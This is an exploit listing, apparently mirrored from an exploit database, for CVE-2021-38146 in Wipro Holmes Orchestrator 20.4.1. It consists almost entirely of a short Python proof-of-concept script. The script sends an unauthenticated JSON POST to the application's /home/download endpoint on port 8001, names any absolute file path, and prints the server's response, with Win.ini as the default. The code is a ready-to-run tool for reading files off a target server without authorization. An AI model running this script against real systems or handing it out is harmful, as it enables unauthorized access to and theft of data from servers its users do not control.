Wipro Holmes Orchestrator 20.4.1 Arbitrary File Download Exploit CVE-2021-38146

## https://sploitus.com/exploit?id=1337DAY-ID-37046
# Exploit Title: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Read PoC
# Exploit Author: Rizal Muhammed @ub3rsick
# Vendor Homepage: https://www.wipro.com/holmes/
# Version: 20.4.1
# Tested on: Windows 10 x64
# CVE : CVE-2021-38146

import requests as rq
import argparse

port = 8001    # change port if application is running on different port

def file_download(host, filepath):
  vuln_url = "http://%s:%s/home/download" % (host, port)
  data = {
    "SearchString": filepath,
    "Msg": ""
  }

  hdr = {
    "content-type": "application/json"
  }

  resp = rq.post(vuln_url, headers=hdr, json=data)

  print resp.text

def main():
  parser = argparse.ArgumentParser(
      description="CVE-2021-38146 - Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Download",
      epilog="Vulnerability Discovery and PoC Author - Rizal Muhammed @ub3rsick"
    )
  parser.add_argument("-t","--target-ip", help="IP Address of the target server", required=True)
  parser.add_argument("-f","--file-path", help="Absolute Path of the file to download", default="C:/Windows/Win.ini")
  args = parser.parse_args()

  if "\\" in args.file_path:
    fp = args.file_path.replace("\\", "/")
  else:
    fp = args.file_path
  file_download(args.target_ip, fp)

if __name__ == "__main__":
  main()